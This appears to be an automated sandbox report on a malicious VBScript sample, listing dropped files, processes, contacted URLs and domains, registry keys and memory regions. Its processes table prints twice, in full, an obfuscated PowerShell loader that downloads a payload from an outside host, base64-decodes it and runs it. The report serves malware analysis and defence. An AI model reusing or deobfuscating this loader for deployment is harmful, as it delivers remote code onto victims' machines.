Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
O1CZjzItH1.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54r042fw.vls.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffp2rddx.yxi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gknezywg.lgx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgahyxoc.kig.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Udviklingsegnes.sep
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser
Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria;
for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function
Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal
I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie
Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi
a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N
ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes
'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov.
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes '
ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes '
npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La
D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens
(Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy
gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS
.ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes
' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr
Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE
Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos
nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up
om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS
enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens
(Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[
els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes
'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge
Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl
M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI
oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam
n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo
d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens
(Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes
'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt
Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes
'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea
Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC
enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes
'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp
BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN
R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh
blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF
uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd
nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub
B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS
NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale.
Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens
(Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt
eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi
TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser
Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria;
for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function
Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal
I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie
Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi
a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N
ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes
'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov.
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes '
ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes '
npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La
D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens
(Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy
gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS
.ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes
' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr
Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE
Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos
nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up
om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS
enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens
(Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[
els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes
'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge
Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl
M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI
oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam
n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo
d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens
(Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes
'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt
Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes
'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea
Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC
enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes
'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp
BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN
R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh
blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF
uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd
nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub
B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS
NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale.
Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens
(Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt
eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi
TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://synep.ro/Lysbad.psp
|
31.14.12.249
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://synep.ro/Lysbad.pspXR
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://synep.ro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://synep.ro/Lysbad.pspP
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://synep.ro
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
gormezl_6777.6777.6777.677e
|
unknown
|
|
|
|
synep.ro
|
31.14.12.249
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
31.14.12.249
|
synep.ro
|
Romania
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5886000
|
trusted library allocation
|
page read and write
|
|
|
|
84D0000
|
direct allocation
|
page execute and read and write
|
|
|
|
28025C7E000
|
trusted library allocation
|
page read and write
|
|
|
|
C936000
|
direct allocation
|
page execute and read and write
|
|
|
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B96000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848D30000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
heap
|
page read and write
|
||
|
A534476000
|
stack
|
page read and write
|
||
|
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
|
1B0864E1000
|
heap
|
page read and write
|
||
|
1B08479D000
|
heap
|
page read and write
|
||
|
109A199000
|
stack
|
page read and write
|
||
|
8241000
|
heap
|
page read and write
|
||
|
1B084788000
|
heap
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
109AAFD000
|
stack
|
page read and write
|
||
|
28013D40000
|
heap
|
page read and write
|
||
|
43E0000
|
trusted library allocation
|
page read and write
|
||
|
28015A6B000
|
heap
|
page read and write
|
||
|
1CFB5970000
|
heap
|
page read and write
|
||
|
1B08477A000
|
heap
|
page read and write
|
||
|
7162000
|
heap
|
page read and write
|
||
|
28015AFE000
|
heap
|
page read and write
|
||
|
A533DA3000
|
stack
|
page read and write
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
1B0849F5000
|
heap
|
page read and write
|
||
|
815B000
|
stack
|
page read and write
|
||
|
280140A5000
|
heap
|
page read and write
|
||
|
7030000
|
heap
|
page read and write
|
||
|
827B000
|
heap
|
page read and write
|
||
|
A5347FB000
|
stack
|
page read and write
|
||
|
109A9FF000
|
stack
|
page read and write
|
||
|
A136000
|
direct allocation
|
page execute and read and write
|
||
|
73E0000
|
trusted library allocation
|
page read and write
|
||
|
28016791000
|
trusted library allocation
|
page read and write
|
||
|
1B0864F4000
|
heap
|
page read and write
|
||
|
1B0849F8000
|
heap
|
page read and write
|
||
|
1B084620000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
28013DAD000
|
heap
|
page read and write
|
||
|
1B084780000
|
heap
|
page read and write
|
||
|
1B0847DC000
|
heap
|
page read and write
|
||
|
109ADFF000
|
stack
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
2802E0F3000
|
heap
|
page read and write
|
||
|
4560000
|
trusted library allocation
|
page execute and read and write
|
||
|
BCA000
|
heap
|
page read and write
|
||
|
7077000
|
heap
|
page read and write
|
||
|
1B0847AD000
|
heap
|
page read and write
|
||
|
998000
|
heap
|
page read and write
|
||
|
700E000
|
stack
|
page read and write
|
||
|
4595000
|
heap
|
page execute and read and write
|
||
|
A533DEF000
|
stack
|
page read and write
|
||
|
1B08477A000
|
heap
|
page read and write
|
||
|
1B0849FC000
|
heap
|
page read and write
|
||
|
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
|
2802E360000
|
heap
|
page read and write
|
||
|
2801609A000
|
trusted library allocation
|
page read and write
|
||
|
28025EF8000
|
trusted library allocation
|
page read and write
|
||
|
4821000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
|
28015C95000
|
trusted library allocation
|
page read and write
|
||
|
7FF848B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0864E8000
|
heap
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0864E1000
|
heap
|
page read and write
|
||
|
1B0847B9000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B0847DC000
|
heap
|
page read and write
|
||
|
6E11000
|
heap
|
page read and write
|
||
|
1B0847BC000
|
heap
|
page read and write
|
||
|
A5340FE000
|
stack
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
A53437E000
|
stack
|
page read and write
|
||
|
51EE37F000
|
stack
|
page read and write
|
||
|
8000000
|
heap
|
page read and write
|
||
|
46DE000
|
stack
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28013E2D000
|
heap
|
page read and write
|
||
|
A5345FF000
|
stack
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page read and write
|
||
|
7400000
|
trusted library allocation
|
page read and write
|
||
|
A53477E000
|
stack
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
4800000
|
trusted library allocation
|
page read and write
|
||
|
28013DE5000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
280167A7000
|
trusted library allocation
|
page read and write
|
||
|
28013F80000
|
heap
|
page readonly
|
||
|
811C000
|
stack
|
page read and write
|
||
|
1B0847AD000
|
heap
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
43F0000
|
trusted library allocation
|
page read and write
|
||
|
5849000
|
trusted library allocation
|
page read and write
|
||
|
4810000
|
heap
|
page execute and read and write
|
||
|
7FF848B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
BAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0847B7000
|
heap
|
page read and write
|
||
|
2802DF70000
|
heap
|
page read and write
|
||
|
5179000
|
trusted library allocation
|
page read and write
|
||
|
28017AA4000
|
trusted library allocation
|
page read and write
|
||
|
28013CD0000
|
heap
|
page read and write
|
||
|
1B086510000
|
heap
|
page read and write
|
||
|
8E3000
|
heap
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
1B0847D6000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
2802E05C000
|
heap
|
page read and write
|
||
|
1B08478B000
|
heap
|
page read and write
|
||
|
1CFB5CA0000
|
heap
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
44DE000
|
stack
|
page read and write
|
||
|
1B0864FC000
|
heap
|
page read and write
|
||
|
A53524D000
|
stack
|
page read and write
|
||
|
7FF848C6A000
|
trusted library allocation
|
page read and write
|
||
|
1B0847CA000
|
heap
|
page read and write
|
||
|
DD36000
|
direct allocation
|
page execute and read and write
|
||
|
28013CE0000
|
heap
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
1B08478B000
|
heap
|
page read and write
|
||
|
B70000
|
trusted library section
|
page read and write
|
||
|
BB9000
|
trusted library allocation
|
page read and write
|
||
|
1B0864E1000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
28015859000
|
heap
|
page read and write
|
||
|
824D000
|
heap
|
page read and write
|
||
|
1B0864E0000
|
heap
|
page read and write
|
||
|
1B08471D000
|
heap
|
page read and write
|
||
|
7FF848AB4000
|
trusted library allocation
|
page read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
28013FE0000
|
trusted library allocation
|
page read and write
|
||
|
